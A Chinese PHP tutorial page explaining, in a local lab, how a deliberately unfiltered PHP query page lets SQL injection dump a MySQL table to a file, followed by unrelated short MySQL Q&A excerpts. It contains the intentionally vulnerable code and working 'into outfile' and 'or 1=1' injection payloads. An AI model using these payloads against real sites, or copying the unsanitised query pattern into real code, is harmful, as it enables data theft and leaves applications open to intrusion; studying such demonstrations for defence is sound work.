分享一篇使用SQL注入漏洞拖庫的實例講解-mysql教程-PHP中文網

首頁

資料庫

mysql教程

分享一篇使用SQL注入漏洞拖庫的實例講解

零下一度

May 17, 2017 pm 03:56 PM

利用SQL注入漏洞登入後台、利用SQL注入漏洞拖庫是我學習了相關內容之後的一點小結，沒啥深度。

同上一篇文章一樣，我們需要建立資料表，並在表中出入幾個資料以備測試之用。
在資料庫中建立一張表：

程式碼如下:

CREATE TABLE `article` ( 
`articleid` int(11) NOT 
NULL
 AUTO_INCREMENT, 
`title` varchar(100) CHARACTER 
SET
 utf8 NOT NULL DEFAULT &#39;&#39;, 
`content` text CHARACTER SET utf8 NOT NULL, 
PRIMARY 
KEY
 (`articleid`) 
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;

在表中插入資料的操作我就不貼程式碼了，可以去下載下來直接匯入到資料庫。
接下來，寫一個處理用戶請求的頁面，這裡，我們故意不過濾用戶提交過來的數據，留下個SQL注入漏洞用來測試。
程式碼如下：

程式碼如下:

<?php 
$servername = "localhost"; 
$dbusername = "root"; 
$dbpassword = ""; 
$dbname = "test"; 
$id=$_GET[&#39;id&#39;];//id未经过滤 
$conn=mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); 
mysql_select_db($dbname,$conn); 
mysql_query(&#39;set names utf8&#39;); 
$sql = "SELECT * FROM article WHERE articleid=&#39;$id&#39;"; 
$result = mysql_query($sql,$conn); 
$row = mysql_fetch_array($result); 
echo "<p>利用SQL注入漏洞拖库<p>"; 
if (!$row){ 
echo "该记录不存在"; 
exit; 
} 
echo "标题<br>".$row[&#39;title&#39;]."<p>"; 
echo "内容<br>".$row[&#39;content&#39;]."<p>"; 
?>

我們直接在瀏覽器中輸入：
127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php? id=1
即可存取article表中id為1的一筆記錄
存取結果如下：

接下來，我們就利用這個漏洞(不知道漏洞的情況下，只能透過工具+手動偵測)，示範如何將article表下載下來。
在網址列輸入：' into outfile 'e:/sql.txt'%23
分析：%23是#的ASCII碼，由於在網址列直接輸入#後到資料庫系統會變成空，需要在網址列輸入%23，那麼才會變成#，進而註解掉後面的sql語句。
運行之後，打開E盤，發現多了一個sql.txt文件，打開之後，裡面就是表article中的一筆記錄。
為什麼只有一筆記錄呢？難道該數據表就只有一筆記錄？不是這樣的，因為我們只檢索id為1的一筆記錄而已，那麼能否將article表中的所有記錄一次全部下載下來呢？
答案是可以的，只要你的建構的SQL語句夠靈活(再次提出了建構SQL語句的彈性)。
分析一下，當在URL位址列中輸入'into outfile 'e:/sql.txt'%23的時候，合併到sql查詢語句中變成：
SELECT * FROM article WHERE articleid='5 ' into outfile 'e:/whf.txt'#'
仔細分析下之後，我們可以這樣子建構SQL語句：
SELECT * FROM article WHERE articleid='' 或 1=1 into outfile 'e: /whf.txt'#'
這樣的話，無論如何WHERE子句總是為真，換句話說，該sql語句等價於如下：
SELECT * FROM article into outfile 'e:/whf.txt'#'
懂了吧，該sql語句在先執行select語句，將表article中的所以內容全部檢索出來，然後再執行into outfile 'e:/whf.txt' #'將內容匯出來。
不信的話，你執行下…
利用SQL注入漏洞，我們可以猜測表名，列名，用戶的密碼長度(LEFT函數)等等，當然了，如果能直接向以上的演示那樣將表中的資料全部匯出的話就沒必要去猜表名列名等等。
有點累了，就寫到這裡了。
利用SQL注入漏洞登入後台、利用SQL注入漏洞拖庫是我學習了相關內容之後的一點小結，沒啥深度，正如文章開頭所說，權當總結，別無它意。

【相關推薦】

1. 特別推薦：「php程式設計師工具箱」V0.1版本下載

2. 如何防止sql注入？介紹5種防止sql注入的方法

3. 分享五個著名的SQL注入漏洞掃描工具

4. 分享一個SQL注入的實例過程

以上是分享一篇使用SQL注入漏洞拖庫的實例講解的詳細內容。更多資訊請關注PHP中文網其他相關文章！

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

說明InnoDB重做日誌和撤消日誌的作用。Apr 15, 2025 am 12:16 AM

InnoDB使用redologs和undologs確保數據一致性和可靠性。 1.redologs記錄數據頁修改，確保崩潰恢復和事務持久性。 2.undologs記錄數據原始值，支持事務回滾和MVCC。

在解釋輸出（類型，鍵，行，額外）中要查找的關鍵指標是什麼？Apr 15, 2025 am 12:15 AM

EXPLAIN命令的關鍵指標包括type、key、rows和Extra。 1）type反映查詢的訪問類型，值越高效率越高，如const優於ALL。 2）key顯示使用的索引，NULL表示無索引。 3）rows預估掃描行數，影響查詢性能。 4）Extra提供額外信息，如Usingfilesort提示需要優化。

在解釋中使用臨時狀態以及如何避免它是什麼？Apr 15, 2025 am 12:14 AM

Usingtemporary在MySQL查詢中表示需要創建臨時表，常見於使用DISTINCT、GROUPBY或非索引列的ORDERBY。可以通過優化索引和重寫查詢避免其出現，提升查詢性能。具體來說，Usingtemporary出現在EXPLAIN輸出中時，意味著MySQL需要創建臨時表來處理查詢。這通常發生在以下情況：1)使用DISTINCT或GROUPBY時進行去重或分組；2)ORDERBY包含非索引列時進行排序；3)使用複雜的子查詢或聯接操作。優化方法包括：1)為ORDERBY和GROUPB

描述不同的SQL交易隔離級別（讀取未讀取，讀取，可重複的讀取，可序列化）及其在MySQL/InnoDB中的含義。Apr 15, 2025 am 12:11 AM

MySQL/InnoDB支持四種事務隔離級別：ReadUncommitted、ReadCommitted、RepeatableRead和Serializable。 1.ReadUncommitted允許讀取未提交數據，可能導致臟讀。 2.ReadCommitted避免臟讀，但可能發生不可重複讀。 3.RepeatableRead是默認級別，避免臟讀和不可重複讀，但可能發生幻讀。 4.Serializable避免所有並發問題，但降低並發性。選擇合適的隔離級別需平衡數據一致性和性能需求。

MySQL與其他數據庫：比較選項Apr 15, 2025 am 12:08 AM

MySQL適合Web應用和內容管理系統，因其開源、高性能和易用性而受歡迎。 1)與PostgreSQL相比，MySQL在簡單查詢和高並發讀操作上表現更好。 2)相較Oracle，MySQL因開源和低成本更受中小企業青睞。 3)對比MicrosoftSQLServer，MySQL更適合跨平台應用。 4)與MongoDB不同，MySQL更適用於結構化數據和事務處理。

MySQL索引基數如何影響查詢性能？Apr 14, 2025 am 12:18 AM

MySQL索引基数对查询性能有显著影响：1.高基数索引能更有效地缩小数据范围，提高查询效率；2.低基数索引可能导致全表扫描，降低查询性能；3.在联合索引中，应将高基数列放在前面以优化查询。

MySQL：新用戶的資源和教程Apr 14, 2025 am 12:16 AM

MySQL學習路徑包括基礎知識、核心概念、使用示例和優化技巧。 1)了解表、行、列、SQL查詢等基礎概念。 2)學習MySQL的定義、工作原理和優勢。 3)掌握基本CRUD操作和高級用法，如索引和存儲過程。 4)熟悉常見錯誤調試和性能優化建議，如合理使用索引和優化查詢。通過這些步驟，你將全面掌握MySQL的使用和優化。